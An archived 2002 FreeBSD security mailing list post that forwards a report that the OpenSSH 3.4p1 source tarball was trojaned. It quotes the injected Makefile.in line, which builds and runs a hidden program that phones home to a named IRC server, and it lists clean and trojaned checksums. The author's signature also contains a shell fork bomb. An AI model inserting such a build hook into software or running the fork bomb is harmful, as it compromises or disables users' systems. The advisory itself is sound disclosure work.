From owner-freebsd-security Thu Aug 1 0:35:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CF2D937B400 for ; Thu, 1 Aug 2002 00:35:20 -0700 (PDT) Received: from topaz.mdcc.cx (topaz.mdcc.cx [212.204.230.141]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6CA7343E6A for ; Thu, 1 Aug 2002 00:35:20 -0700 (PDT) (envelope-from edwin@mavetju.org) Received: from k7.mavetju (topaz.mdcc.cx [212.204.230.141]) by topaz.mdcc.cx (Postfix) with ESMTP id 8367B2B8D6 for ; Thu, 1 Aug 2002 09:35:17 +0200 (CEST) Received: by k7.mavetju (Postfix, from userid 1001) id 0917C6A711E; Thu, 1 Aug 2002 17:35:13 +1000 (EST) Date: Thu, 1 Aug 2002 17:35:12 +1000 From: Edwin Groothuis To: freebsd-security@freebsd.org Subject: openssh-3.4p1.tar.gz trojaned Message-ID: <20020801073512.GB78390@k7.mavetju> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org FYI (I'm not on -security) ----- Forwarded message from Edwin Groothuis ----- Date: Thu, 1 Aug 2002 16:55:51 +1000 From: Edwin Groothuis To: incidents@securityfocus.com Subject: openssh-3.4p1.tar.gz trojaned Greetings, Just want to inform you that the OpenSSH package op ftp.openbsd.org (and probably all its mirrors now) it trojaned: ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz The OpenBSD people have been informed about it (via email to deraadt@openbsd.org and via irc.openprojects.org/#openbsd) The changed files are openssh-3.4p1/openbsd-compat/Makefile.in: all: libopenbsd-compat.a + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out & bf-test.c[1] is nothing more than a wrapper which generates a shell-script[2] which compiles itself and tries to connect to an server running on 203.62.158.32:6667 (web.snsonline.net). [1] http://www.mavetju.org/~edwin/bf-test.c [2] http://www.mavetju.org/~edwin/bf-output.sh This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system: MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz: MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57 Edwin -- Edwin Groothuis | Personal website: http://www.MavEtJu.org edwin@mavetju.org | Weblog: http://www.mavetju.org/weblog/weblog.php bash$ :(){ :|:&};: | Interested in MUDs? http://www.FatalDimensions.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message